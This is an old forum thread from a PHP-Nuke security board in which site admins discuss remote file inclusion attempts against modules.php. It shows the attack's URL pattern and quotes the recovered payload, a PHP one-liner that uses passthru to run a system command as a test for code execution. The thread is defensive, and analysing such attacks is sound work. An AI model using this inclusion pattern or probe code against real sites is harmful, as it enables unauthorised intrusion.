Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm)
Author Message
kguske
Site Admin



Joined: Jun 04, 2004
Posts: 6433

PostPosted: Thu Sep 23, 2004 1:49 pm Reply with quote

Since yesterday, several sites have been attacked from 3 different IPs using a similar attack. Sentinel blocks this with the Filter blocker.

The form of the attack looks like the following (where I show IP below, there is actually an IP address followed by a slash, a cryptic directory name, and a question mark):

modules.php?name=IP&file=IP&mode=IP&t=IP

I'm guessing the webmasters of these sites (e.g. one is a church, another is a porn site) don't know that their sites are being used to host this attack (at least not the church, which I notified) or that the cryptic directory and index.php inside it have been created there.

What is the attack trying to accomplish?
 
View user's profile Send private message
oprime2001
Worker
Worker



Joined: Jun 04, 2004
Posts: 119
Location: Chicago IL USA

PostPosted: Thu Sep 23, 2004 3:04 pm Reply with quote

They actually got blocked on my sites due to their use of curl which matched a Harvester string. The hack attempts came from Netherlands and Spain IP addresses.

I was able to download one of the files that was used in the hack attempt, and it contained:
Code:
<?php echo "\nbl3"; echo "bl3 "; passthru("uname -a 2>&1"); ?>
 
View user's profile Send private message
BobMarion
Former Admin in Good Standing



Joined: Oct 30, 2002
Posts: 1037
Location: RedNeck Land (known as Kentucky)

PostPosted: Thu Sep 23, 2004 4:08 pm Reply with quote

This sounds alot like the rash of hack attempts that used a whatever.gif? in the iped http address. If I'm not mistaken one of them was a script to try and rape your author db, another was a script to try and rape your user db, and the others God only knows what they were Sad

_________________
Bob Marion
Codito Ergo Sum
http://www.nukescripts.net 
View user's profile Send private message Send e-mail Visit poster's website
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> NukeSentinel(tm)

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©